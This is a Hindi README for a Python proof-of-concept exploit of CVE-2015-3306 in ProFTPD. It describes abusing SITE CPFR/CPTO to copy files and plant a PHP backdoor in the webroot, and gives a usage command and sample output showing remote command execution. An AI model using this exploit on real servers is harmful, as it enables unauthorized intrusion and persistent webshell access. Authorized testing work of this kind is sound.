
Python PoC शोषण CVE-2015-3306 ProFTPD निर्देशिका ट्रैवर्सल के लिए। फाइलों की प्रतिलिपि बनाता है और SITE CPFR/CPTO FTP कमांड के माध्यम से दूरस्थ कमांड निष्पादन के लिए वेबरूट में PHP बैकडोर ड्रॉप करता है।
यह रिपॉजिटरी में CVE-2015-3306 के लिए एक Python प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण शामिल है।
⚠️ चेतावनी: इसका उपयोग केवल उन सिस्टम्स पर करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। अनधिकृत शोषण अवैध है।
Mohamed EL-KHAROUATI
CVE-2015-3306 ProFTPD 1.3.5b और उससे पहले के संस्करणों में एक डायरेक्टरी ट्रैवर्सल कमजोरी है। यह शोषण मनमाने फ़ाइलों की प्रतिलिपि बनाने और वेबरूट में एक PHP बैकडोर डालने की अनुमति देता है। बैकडोर मनमाने शेल कमांड्स को निष्पादित कर सकता है।
SITE CPFR/CPTO FTP कमांड्स के माध्यम से डायरेक्टरी ट्रैवर्सल कमजोरी का शोषण करता है।backdoor.php) डालता है।--rcommand के माध्यम से कस्टम कमांड्स का समर्थन करता है।requests लाइब्रेरी (pip install requests)# Run the exploit
python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>
# Example:
python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami
# Expected Output:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <target_ip>
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
[+] Running whoami: www-data
[+] Done